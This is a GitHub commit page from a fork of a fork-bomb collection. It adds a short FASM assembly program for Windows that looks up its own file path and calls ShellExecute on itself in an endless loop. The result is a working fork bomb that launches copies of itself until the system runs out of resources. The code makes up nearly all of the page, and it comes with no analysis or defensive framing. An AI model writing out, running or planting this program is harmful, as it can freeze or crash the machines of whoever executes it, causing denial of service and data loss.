forked from aaronryank/fork-bomb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
MD XF
authored
Oct 17, 2017
1 parent
84a8439
commit 8e131fa
Showing
1 changed file
with
36 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,36 @@ | ||
| format PE GUI 4.0 | ||
| entry start | ||
| section '.text' code readable executable | ||
| start: | ||
| pushd 1000 | ||
| pushd path | ||
| pushd 0 | ||
| call [GetModuleFileName] | ||
| @@: | ||
| pushd 1 | ||
| pushd 0 | ||
| pushd 0 | ||
| pushd path | ||
| pushd command | ||
| pushd 0 | ||
| call [ShellExecute] | ||
| jmp @b | ||
| section '.data' data readable writeable | ||
| path rb 1000 | ||
| command db "open" | ||
| section '.idata' import data readable writeable | ||
| dd 0,0,0,RVA kernel32id,RVA kernel32 | ||
| dd 0,0,0,RVA shell32id,RVA shell32 | ||
| kernel32: | ||
| GetModuleFileName dd RVA _GetModuleFileName | ||
| dd 0 | ||
| shell32: | ||
| ShellExecute dd RVA _ShellExecute | ||
| dd 0 | ||
| kernel32id db 'kernel32.dll',0 | ||
| shell32id db 'shell32.dll',0 | ||
| _GetModuleFileName dw 0 | ||
| db 'GetModuleFileNameA',0 | ||
| _ShellExecute dw 0 | ||
| db 'ShellExecuteA',0 | ||
| section '.reloc' fixups data readable discardable |